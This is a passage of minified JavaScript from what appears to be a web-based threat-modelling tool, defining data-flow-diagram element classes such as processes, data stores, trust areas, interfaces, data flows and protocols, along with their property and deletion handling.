i&&this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.SoftwareStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}GetCountermeasuresApplicable(){let e=[];this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.SoftwareStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}FindReferences(e,i){let n=super.FindReferences(e,i);return this.SoftwareStack&&n.push({Type:li.DeleteStack,Param:this.SoftwareStack}),this.ProcessStack&&n.push({Type:li.DeleteStack,Param:this.ProcessStack}),this.AssetGroup&&n.push({Type:li.DeleteAssetGroup,Param:this.AssetGroup}),this.Checklists.forEach(r=>n.push({Type:li.DeleteChecklist,Param:r})),n}OnDelete(e,i){super.OnDelete(e,i),this.FindReferences(e,i).forEach(r=>{r.Type==li.DeleteDiagram?e.DeleteDiagram(r.Param):r.Type==li.DeleteStack?e.DeleteStack(r.Param):r.Type==li.DeleteAssetGroup?e.DeleteAssetGroup(r.Param):r.Type==li.DeleteChecklist&&e.DeleteChecklist(r.Param)})}initProperties(){super.initProperties(),this.AddProperty("properties.InterfaceTop","InterfaceTop","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceRight","InterfaceRight","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceBottom","InterfaceBottom","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceLeft","InterfaceLeft","",!0,Ii.DevInterfaceName,!0)}}return t.Icon="devices",t})();class wG extends ns{constructor(a,e,i){super(a,Aa.ExternalEntity,e,i)}}class As extends ns{get diagramID(){var a;return null===(a=this.project.FindDiagramOfElement(this.Ref.ID))||void 0===a?void 0:a.ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)))}static InstantiateRef(a,e,i){if(a instanceof sf)return Hg.InstantiateRef(a,e,i);let n=new As({},a.Type,e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class Hg extends sf{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i){super(a,e,i),this.project=e,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.OutOfScopeChanged.subscribe(a=>this.OutOfScopeChanged.emit(a)))}static InstantiateRef(a,e,i){let n=new Hg({},e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}var Et=(()=>{return(t=Et||(Et={}))[t.None=0]="None",t[t.LogProcessing=11]="LogProcessing",t[t.PhyProcessing=12]="PhyProcessing",t[t.LogDataStore=21]="LogDataStore",t[t.PhyDataStore=22]="PhyDataStore",t[t.LogExternalEntity=31]="LogExternalEntity",t[t.PhyExternalEntity=32]="PhyExternalEntity",t[t.DataFlow=41]="DataFlow",t[t.PhysicalLink=51]="PhysicalLink",t[t.Interface=61]="Interface",t[t.LogTrustArea=71]="LogTrustArea",t[t.PhyTrustArea=72]="PhyTrustArea",Et;var t})();class Sc{static Constructor(a){switch(a){case Et.LogTrustArea:return qp;case Et.PhyTrustArea:return jg;case Et.LogProcessing:return Bp;case Et.PhyProcessing:return Ug;case Et.LogDataStore:return Hp;case Et.PhyDataStore:return qg;case Et.LogExternalEntity:return Up;case Et.PhyExternalEntity:return Gg;case Et.DataFlow:return os;case Et.PhysicalLink:return lf;case Et.Interface:return Nu;default:return console.error("Missing Element Type in ElementTypeUtil.Constructor()",a),null}}static GetPhyiscalID(a){switch(a){case Et.LogDataStore:return Et.PhyDataStore;case Et.LogProcessing:return Et.PhyProcessing;case Et.LogExternalEntity:return Et.PhyExternalEntity;case Et.LogTrustArea:return Et.PhyTrustArea;default:return null}}static GetTypes(){return[Et.LogProcessing,Et.PhyProcessing,Et.LogDataStore,Et.PhyDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.LogTrustArea,Et.PhyTrustArea,Et.DataFlow,Et.PhysicalLink,Et.Interface]}static Icon(a){switch(a){case Et.LogTrustArea:return qp.Icon;case Et.PhyTrustArea:return jg.Icon;case Et.LogProcessing:return Bp.Icon;case Et.PhyProcessing:return Ug.Icon;case Et.LogDataStore:return Hp.Icon;case Et.PhyDataStore:return qg.Icon;case Et.LogExternalEntity:return Up.Icon;case Et.PhyExternalEntity:return Gg.Icon;case Et.DataFlow:return os.Icon;case Et.PhysicalLink:return lf.Icon;case Et.Interface:return Nu.Icon;default:return console.error("Missing Element Type in ElementTypeUtil.Icon()",a),null}}static IsPhysical(a){switch(a){case Et.None:case Et.LogTrustArea:return!1;case Et.PhyTrustArea:return!0;case Et.LogProcessing:return!1;case Et.PhyProcessing:return!0;case Et.LogDataStore:return!1;case Et.PhyDataStore:return!0;case Et.LogExternalEntity:return!1;case Et.PhyExternalEntity:return!0;case Et.DataFlow:return!1;case Et.PhysicalLink:case Et.Interface:return!0;default:return console.error("Missing Element Type in ElementTypeUtil.IsPhysical()",a),null}}static ToString(a){switch(a){case Et.LogTrustArea:return"Logical Trust Area";case Et.PhyTrustArea:return"Physical Trust Area";case Et.LogProcessing:return"Logical Process";case Et.PhyProcessing:return"Physical Processor";case Et.LogDataStore:return"Logical Data Store";case Et.PhyDataStore:return"Physical Data Store";case Et.LogExternalEntity:return"Logical External Entity";case Et.PhyExternalEntity:return"Physical External Entity";case Et.DataFlow:return"Data Flow";case Et.PhysicalLink:return"Physical Link";case Et.Interface:return"Interface";default:return console.error("Missing Element Type in ElementTypeUtil.ToString()",a),null}}}class oM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.IsDefault||(this.Data.IsDefault=!1),this.Properties||(this.Properties=[])}get ElementTypeID(){return this.Data.ElementTypeID}set ElementTypeID(a){this.Data.ElementTypeID=a}get IsDefault(){return this.Data.IsDefault}set IsDefault(a){this.Data.IsDefault=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}get PropertyOverwrites(){return this.Data.PropertyOverwrites}set PropertyOverwrites(a){this.Data.PropertyOverwrites=a}get TemplateDFD(){return this.config.GetStencilTypeTemplate(this.Data.templateDFDID)}set TemplateDFD(a){this.Data.templateDFDID=null==a?void 0:a.ID}FindReferences(a,e){let i=[];return null==a||a.GetDFDElements().filter(n=>n.GetProperty("Type").ID==this.ID).forEach(n=>i.push({Type:li.ResetStencilType,Param:n})),e.GetThreatRules().filter(n=>{var r;return n.RuleType==on.Stencil&&(null===(r=n.StencilRestriction)||void 0===r?void 0:r.stencilTypeID)==this.ID}).forEach(n=>i.push({Type:li.DeleteThreatRule,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.GetStencilTypes().find(r=>r.IsDefault&&r.ElementTypeID==this.ElementTypeID);i.forEach(r=>{r.Type==li.ResetStencilType?r.Param.SetProperty("Type",n):r.Type==li.DeleteThreatRule&&e.DeleteThreatRule(r.Param)})}static FromJSON(a,e){return new oM(a,e)}}class rM extends Ln{constructor(a,e){super(a),this.config=e,this.ListInHWDiagram||(this.ListInHWDiagram=!0),this.ListInElementTypeIDs||(this.ListInElementTypeIDs=[]),this.Layout||(this.Layout=[]),this.Data.stencilTypeIDs||(this.Data.stencilTypeIDs=[]),null==this.CanEditInWhichDiagram&&(this.CanEditInWhichDiagram=!0)}get CanEditInWhichDiagram(){return this.Data.CanEditInWhichDiagram}set CanEditInWhichDiagram(a){this.Data.CanEditInWhichDiagram=a}get ListInHWDiagram(){return this.Data.ListInHWDiagram}set ListInHWDiagram(a){this.Data.ListInHWDiagram=a}get ListInUCDiagram(){return this.Data.ListInUCDiagram}set ListInUCDiagram(a){this.Data.ListInUCDiagram=a}get ListInElementTypeIDs(){return this.Data.ListInElementTypeIDs}set ListInElementTypeIDs(a){this.Data.ListInElementTypeIDs=a}get StencilTypes(){return this.config.GetStencilTypes().filter(a=>this.Data.stencilTypeIDs.includes(a.ID))}set StencilTypes(a){for(this.Data.stencilTypeIDs=a.map(e=>e.ID);this.Layout.length<a.length;)this.Layout.push({name:null,x:0,y:0,canEditSize:!1,width:0,height:0});for(;this.Layout.length>a.length;)this.Layout.pop();for(let e=0;e<a.length;e++)this.Layout[e].canEditSize=a[e].ElementTypeID==Et.LogTrustArea||a[e].ElementTypeID==Et.PhyTrustArea,this.Layout[e].name=a[e].Name}get Layout(){return this.Data.Layout}set Layout(a){this.Data.Layout=a}FindReferences(a,e){let i=[];return e.GetStencilTypes().filter(n=>n.TemplateDFD==this).forEach(n=>{i.push({Type:li.RemoveStencilTypeTemplateFromStencilType,Param:this})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveStencilTypeTemplateFromStencilType&&(n.Param.TemplateDFD=null)})}static FromJSON(a,e){return new rM(a,e)}}class sM extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.Letters&&(this.Letters=[])}get Letters(){return this.Data.Letters}set Letters(a){this.Data.Letters=a}GetThreatCategory(a){return this.config.GetThreatCategory(a.threatCategoryID)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatRule)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(n.Param)})}static FromJSON(a,e){return new sM(a,e)}}class lc extends Lp{constructor(a,e,i,n){var r;super(a),this.TypeChanged=new Tt,this.PhysicalElementChanged=new Tt,this.project=i,this.config=n,this.Type=e,0==(null===(r=this.Name)||void 0===r?void 0:r.length)&&(this.Name=i?Gi.FindUniqueName(e.Name,i.GetDFDElements().map(c=>c.Name)):null==e?void 0:e.Name),this.Data.IsPhyiscal||(this.Data.IsPhyiscal=Sc.IsPhysical(e.ElementTypeID)),!this.IsPhysical&&e.ElementTypeID!=Et.DataFlow&&this.AddProperty("properties.PhysicalElement","PhysicalElement","properties.PhysicalElement.tt",!0,Ii.PhysicalElementSelect,!0)}get Type(){return this.config.GetStencilType(this.Data.typeID)}set Type(a){if(this.setTypeProperties(a,this.Type),a)this.Data.typeID=a.ID;else{const e=this.config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==this.Data.ElementTypeID);this.Data.typeID=e?e.ID:null}this.TypeChanged.emit(a)}get Parent(){return this.project.GetDFDElement(this.Data.parentID)||null}set Parent(a){this.Parent&&this.Parent.ID!=a.ID&&this.Parent.RemoveChild(this),this.Data.parentID=a.ID}get IsPhysical(){return this.Data.IsPhyiscal}get PhysicalElement(){return this.project.GetDFDElement(this.Data.physicalElementID)}set PhysicalElement(a){this.Data.physicalElementID=null==a?void 0:a.ID,this.PhysicalElementChanged.emit(a)}FindReferences(a,e){let i=super.FindReferences(a,e);return null==a||a.GetDFDElementRefs().filter(n=>n.Ref.ID==this.ID).forEach(n=>i.push({Type:li.DeleteElementReferences,Param:n})),this instanceof Ys&&i.push({Type:li.MoveChildElements,Param:this.Parent}),this.IsPhysical&&(null==a||a.GetDFDElements().filter(n=>{var r;return(null===(r=n.PhysicalElement)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>i.push({Type:li.RemovePhysicalElementReference,Param:n}))),null==a||a.GetDFDElements().filter(n=>{var r,c;return n instanceof os&&[null===(r=n.Sender)||void 0===r?void 0:r.ID,null===(c=n.Receiver)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.DeleteDataFlow,Param:n})),this instanceof Nu&&(null==a||a.GetDFDElements().filter(n=>{var r,c;return n instanceof os&&[null===(r=n.SenderInterface)||void 0===r?void 0:r.ID,null===(c=n.ReceiverInterface)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.RemoveInterfaceReference,Param:n}))),i}OnDelete(a,e){super.OnDelete(a,e),null!=this.Parent&&this.Parent.RemoveChild(this),this.FindReferences(a,e).forEach(n=>{var r,c;if(n.Type==li.DeleteElementReferences)a.DeleteDDFElement(n.Param);else if(n.Type==li.MoveChildElements&&this instanceof Ys)this.GetChildren().forEach(d=>this.Parent.AddChild(d));else if(n.Type==li.RemovePhysicalElementReference)n.Param.PhysicalElement=null;else if(n.Type==li.RemoveInterfaceReference){let d=n.Param;(null===(r=d.SenderInterface)||void 0===r?void 0:r.ID)==this.ID&&(d.SenderInterface=null),(null===(c=d.ReceiverInterface)||void 0===c?void 0:c.ID)==this.ID&&(d.ReceiverInterface=null)}else n.Type==li.DeleteDataFlow?a.DeleteDDFElement(n.Param):n.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(n.Param)})}static Instantiate(a,e,i){return new(Sc.Constructor(a.ElementTypeID))({},a,e,i)}static FromJSON(a,e,i){let n,r=i.GetStencilType(a.typeID);if(a.refID)n=e.GetDFDElement(a.refID)instanceof Ys?new zm(a,r,e,i):new td(a,r,e,i);else if(a.ElementTypeID==Et.LogTrustArea)n=new qp(a,r,e,i);else if(a.ElementTypeID==Et.PhyTrustArea)n=new jg(a,r,e,i);else if(a.ElementTypeID==Et.LogProcessing)n=new Bp(a,r,e,i);else if(a.ElementTypeID==Et.PhyProcessing)n=new Ug(a,r,e,i);else if(a.ElementTypeID==Et.LogDataStore)n=new Hp(a,r,e,i);else if(a.ElementTypeID==Et.PhyDataStore)n=new qg(a,r,e,i);else if(a.ElementTypeID==Et.LogExternalEntity)n=new Up(a,r,e,i);else if(a.ElementTypeID==Et.PhyExternalEntity)n=new Gg(a,r,e,i);else if(a.ElementTypeID==Et.DataFlow)n=new os(a,r,e,i);else if(a.ElementTypeID==Et.PhysicalLink)n=new lf(a,r,e,i);else if(a.ElementTypeID==Et.Interface)n=new Nu(a,r,e,i);else{if(a.ElementTypeID!=Et.None)throw new Error("Unknown ElementTypeID: "+a.ElementTypeID);n=new Ys(a,r,e,i)}return n}initProperties(){super.initProperties(),this.AddProperty("properties.Type","Type","",!0,Ii.StencilType,!0)}setTypeProperties(a,e){let i=null;if(a&&(i=this.config.GetStencilElementType(a),!a.IsDefault&&i&&i.Properties&&i.Properties.forEach(n=>{var r;this.AddProperty(null==n.DisplayName?n.ID:n.DisplayName,n.ID,n.Tooltip,!1,n.Type,n.Editable);let c=null===(r=a.PropertyOverwrites)||void 0===r?void 0:r.find(d=>d.Key==n.ID);c?n.HasGetter?this[n.ID]=c.Value:this.Data[n.ID]=c.Value:n.HasGetter&&null==this[n.ID]?this[n.ID]=n.DefaultValue:!n.HasGetter&&null==this.Data[n.ID]&&(this.Data[n.ID]=n.DefaultValue)}),a.Properties&&a.Properties.forEach(n=>{this.AddProperty(null==n.DisplayName?n.ID:n.DisplayName,n.ID,n.Tooltip,n.HasGetter,n.Type,n.Editable);try{n.HasGetter&&null==this[n.ID]?this[n.ID]=n.DefaultValue:null==this.Data[n.ID]&&(this.Data[n.ID]=n.DefaultValue)}catch(r){}})),e&&e.Properties&&a.Properties){let n=a.Properties.map(r=>r.ID);i&&n.push(...i.Properties.map(r=>r.ID)),e.Properties.filter(r=>!n.includes(r.ID)).forEach(r=>{delete this.Data[r.ID]})}}}class td extends lc{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.project=i,this.config=n,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:"OutOfScope"==a?this.OutOfScope:this.Ref.GetProperty(a)}SetProperty(a,e){"OutOfScope"==a?this.OutOfScope=e:this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.TypeChanged.subscribe(a=>this.TypeChanged.emit(a)),this.Ref.OutOfScopeChanged.subscribe(a=>this.OutOfScopeChanged.emit(a)))}static InstantiateRef(a,e,i){if(a instanceof Ys)return zm.InstantiateRef(a,e,i);let n=new td({},a.Type,e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class v2 extends lc{get ProcessedData(){var a;let e=[];return null===(a=this.Data.ProcessedDataIDs)||void 0===a||a.forEach(i=>e.push(this.project.GetMyData(i))),e}set ProcessedData(a){this.Data.ProcessedDataIDs=null==a?void 0:a.map(e=>e.ID),a&&a.length>0&&(this.ProcessedDataSensitivity=Math.max(...a.map(e=>e.Sensitivity)))}get ProcessedDataSensitivity(){return this.Data.ProcessedDataSensitivity}set ProcessedDataSensitivity(a){this.Data.ProcessedDataSensitivity=a}constructor(a,e,i,n){super(a,e,i,n),this.Data.ProcessedDataIDs||(this.Data.ProcessedDataIDs=[])}initProperties(){super.initProperties(),this.AddProperty("properties.ProcessedData","ProcessedData","properties.ProcessedData.tt",!0,Ii.MyDataSelect,!0),this.AddProperty("properties.ProcessedDataSensitivity","ProcessedDataSensitivity","properties.ProcessedDataSensitivity.tt",!0,Ii.LowMediumHighSelect,!0,lr.Medium)}}let IG=(()=>{class t extends v2{}return t.Icon="memory",t})();class Bp extends IG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogProcessing}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Bp.ElementTypeID);return e||(e=a.CreateStencilType(Bp.ElementTypeID),e.Name="Process",e.IsDefault=!0),e}}Bp.ElementTypeID=Et.LogProcessing;class Ug extends IG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyProcessing}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Ug.ElementTypeID);return e||(e=a.CreateStencilType(Ug.ElementTypeID),e.Name="Processor",e.IsDefault=!0),e}}Ug.ElementTypeID=Et.PhyProcessing;let RG=(()=>{class t extends v2{}return t.Icon="sd_card",t})();class Hp extends RG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogDataStore}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Hp.ElementTypeID);return e||(e=a.CreateStencilType(Hp.ElementTypeID),e.Name="Data Store",e.IsDefault=!0),e}}Hp.ElementTypeID=Et.LogDataStore;class qg extends RG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyDataStore}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==qg.ElementTypeID);return e||(e=a.CreateStencilType(qg.ElementTypeID),e.Name="Phy Data Store",e.IsDefault=!0),e}}qg.ElementTypeID=Et.PhyDataStore;let SG=(()=>{class t extends v2{}return t.Icon="cloud",t})();class Up extends SG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogExternalEntity}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Up.ElementTypeID);return e||(e=a.CreateStencilType(Up.ElementTypeID),e.Name="Ext. Entity",e.IsDefault=!0),e}}Up.ElementTypeID=Et.LogExternalEntity;class Gg extends SG{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyExternalEntity}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Gg.ElementTypeID);return e||(e=a.CreateStencilType(Gg.ElementTypeID),e.Name="Phy Ext. Entity",e.IsDefault=!0),e}}Gg.ElementTypeID=Et.PhyExternalEntity;class lf extends v2{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhysicalLink}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==lf.ElementTypeID);return e||(e=a.CreateStencilType(lf.ElementTypeID),e.Name="Physical Link",e.IsDefault=!0),e}}lf.Icon="precision_manufacturing",lf.ElementTypeID=Et.PhysicalLink;class Nu extends v2{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.Interface}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Nu.ElementTypeID);return e||(e=a.CreateStencilType(Nu.ElementTypeID),e.Name="Interface",e.IsDefault=!0),e}}Nu.Icon="sync_alt",Nu.ElementTypeID=Et.Interface;class Lu extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.IsDefault&&(this.Data.IsDefault=!1),this.Properties||(this.Properties=[])}static GetDefaultType(a){let e=a.GetProtocols().find(i=>i.IsDefault);return e||(e=a.CreateProtocol(),e.Name="Protocol",e.IsDefault=!0),e}get IsDefault(){return this.Data.IsDefault}set IsDefault(a){this.Data.IsDefault=a}get Properties(){return this.Data.Properties}set Properties(a){this.Data.Properties=a}get PropertyOverwrites(){return this.Data.PropertyOverwrites}set PropertyOverwrites(a){this.Data.PropertyOverwrites=a}GetProperty(a){var e;let i=this.Properties.find(n=>n.ID==a);if(!i&&!this.IsDefault&&(i=Lu.GetDefaultType(this.config).Properties.find(n=>n.ID==a)),i){if(!this.IsDefault){let n=null===(e=this.PropertyOverwrites)||void 0===e?void 0:e.find(r=>r.Key==a);if(n)return n.Value}return i.DefaultValue}return super.GetProperty(a)}SetProperty(a,e){console.log("Protocol set property"),super.SetProperty(a,e)}FindReferences(a,e){let i=[];return e.GetStencilTypes().filter(n=>n.ElementTypeID==Et.DataFlow).forEach(n=>{var r;let c=null===(r=n.PropertyOverwrites)||void 0===r?void 0:r.find(d=>"ProtocolStack"==d.Key);c&&c.Value.includes(this.ID)&&i.push({Type:li.RemoveFromStencilProtocolStack,Param:n})}),null==a||a.GetDFDElements().filter(n=>n.Type.ElementTypeID==Et.DataFlow).filter(n=>n.ProtocolStack.includes(this)).forEach(n=>{i.push({Type:li.RemoveFromElementProtocolStack,Param:n})}),i}OnDelete(a,e){return this.FindReferences(a,e).forEach(n=>{if(n.Type==li.RemoveFromStencilProtocolStack){let r=n.Param.PropertyOverwrites.find(c=>c.Key==this.ID);n.Param.PropertyOverwrites.splice(n.Param.PropertyOverwrites.indexOf(r),1)}else n.Type==li.RemoveFromElementProtocolStack&&n.Param.ProtocolStack.splice(n.Param.ProtocolStack.indexOf(this),1)}),!0}static FromJSON(a,e){return new Lu(a,e)}}class os extends lc{constructor(a,e,i,n){super(a,e,i,n),this.protocolProperties=[],this.LineTypeChanged=new Tt,this.ArrowPosChanged=new Tt,this.BendFlowChanged=new Tt,this.DirectionChanged=new Tt,this.AnchorChanged=new Tt,this.Data.ElementTypeID=Et.DataFlow,this.Data.protocolStackIDs||(this.Data.protocolStackIDs=[]),null==this.OverwriteProtocolProperties&&(this.OverwriteProtocolProperties=!1),this.Data.ProcessedDataIDs||(this.Data.ProcessedDataIDs=[]),this.OverwriteDataProperties=null!=this.Data.OverwriteDataProperties&&this.OverwriteDataProperties,null==this.Data.ShowName&&(this.ShowName=!0),null==this.Data.ShowProtocolDetails&&(this.ShowProtocolDetails=!0),null==this.Data.LineType&&(this.LineType=ed.Solid),null==this.Data.ArrowPos&&(this.ArrowPos=wn.End),Lu.GetDefaultType(this.config).Properties.forEach(r=>{let c=this.AddProperty(r.DisplayName,r.ID,r.Tooltip,r.HasGetter,r.Type,!1,r.DefaultValue);this.protocolProperties.push(r.ID),c.Editable=this.OverwriteProtocolProperties})}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==os.ElementTypeID);return e||(e=a.CreateStencilType(os.ElementTypeID),e.Name="Data Flow",e.IsDefault=!0,e.AddProperty("Overwrite Data","OverwriteDataProperties","By default, processed data and data sensitivity are referenced from sender. Overwrite to set them manually",!0,Ii.CheckBox,!0),e.AddProperty("Processed Data","ProcessedData","Data that the element processes, stores, produces, or receives",!0,Ii.MyDataSelect,!0),e.AddProperty("Data Sensitivity","ProcessedDataSensitivity","Sensitivity of the processed data",!0,Ii.LowMediumHighSelect,!0,lr.Medium),e.AddProperty("Overwrite Stack","OverwriteProtocolProperties","Use either the properties derived from the protocols or define them manually",!0,Ii.CheckBox,!0),e.AddProperty("Protocol Stack","ProtocolStack","List of protocols used within the communication",!0,Ii.ProtocolSelect,!0)),e}get Sender(){return this.project.GetDFDElement(this.Data.senderID)}set Sender(a){this.Data.senderID=a.ID}get Receiver(){return this.project.GetDFDElement(this.Data.receiverID)}set Receiver(a){this.Data.receiverID=null==a?void 0:a.ID}get SenderInterface(){return this.project.GetDFDElement(this.Data.senderInterfaceID)}set SenderInterface(a){this.Data.senderInterfaceID=null==a?void 0:a.ID,this.NameChanged.emit(this.GetProperty("Name"))}get ReceiverInterface(){return this.project.GetDFDElement(this.Data.receiverInterfaceID)}set ReceiverInterface(a){this.Data.receiverInterfaceID=null==a?void 0:a.ID,this.NameChanged.emit(this.GetProperty("Name"))}get OverwriteProtocolProperties(){return this.Data.OverwriteProtocolProperties}set OverwriteProtocolProperties(a){var e;this.Data.OverwriteProtocolProperties=a,null===(e=this.protocolProperties)||void 0===e||e.forEach(i=>{this.GetProperties().find(n=>i==n.ID).Editable=a})}get ProtocolStack(){let a=[];return this.Data.protocolStackIDs.forEach(e=>a.push(this.config.GetProtocol(e))),a}set ProtocolStack(a){this.Data.protocolStackIDs=null==a?void 0:a.map(e=>null!=e&&e.ID?e.ID:e),this.NameChanged.emit(this.GetProperty("Name"))}get ProcessedData(){var a;if(this.OverwriteDataProperties){let e=[];return this.Data.ProcessedDataIDs.forEach(i=>e.push(this.project.GetMyData(i))),e}return null===(a=this.Sender)||void 0===a?void 0:a.GetProperty("ProcessedData")}set ProcessedData(a){this.Data.ProcessedDataIDs=null==a?void 0:a.map(e=>e.ID),a&&a.length>0&&(this.ProcessedDataSensitivity=Math.max(...a.map(e=>e.Sensitivity)))}get ProcessedDataSensitivity(){var a;return this.OverwriteDataProperties?this.Data.ProcessedDataSensitivity:null===(a=this.Sender)||void 0===a?void 0:a.ProcessedDataSensitivity}set ProcessedDataSensitivity(a){this.Data.ProcessedDataSensitivity=a}get OverwriteDataProperties(){return this.Data.OverwriteDataProperties}set OverwriteDataProperties(a){this.Data.OverwriteDataProperties=a;const e=this.GetProperties().find(n=>"ProcessedData"==n.ID);e&&(e.Editable=a);const i=this.GetProperties().find(n=>"ProcessedDataSensitivity"==n.ID);i&&(i.Editable=a)}get FlowType(){return this.Data.FlowType}set FlowType(a){this.Data.FlowType=Number(a),(a==Xs.Extend||a==Xs.Include)&&(this.ShowName=!0,this.LineType=ed.Dashed,this.ArrowPos=a==Xs.Extend?wn.Start:wn.End),this.NameChanged.emit(this.Name)}get ShowName(){return this.Data.ShowName}set ShowName(a){this.Data.ShowName=a,this.NameChanged.emit(this.GetProperty("Name"))}get ShowProtocolDetails(){return this.Data.ShowProtocolDetails}set ShowProtocolDetails(a){this.Data.ShowProtocolDetails=a,this.NameChanged.emit(this.GetProperty("Name"))}get BendFlow(){return this.Data.BendFlow}set BendFlow(a){this.Data.BendFlow=a,this.BendFlowChanged.emit(a)}get LineType(){return this.Data.LineType}set LineType(a){this.Data.LineType=Number(a),this.LineTypeChanged.emit(a)}get ArrowPos(){return this.Data.ArrowPos}set 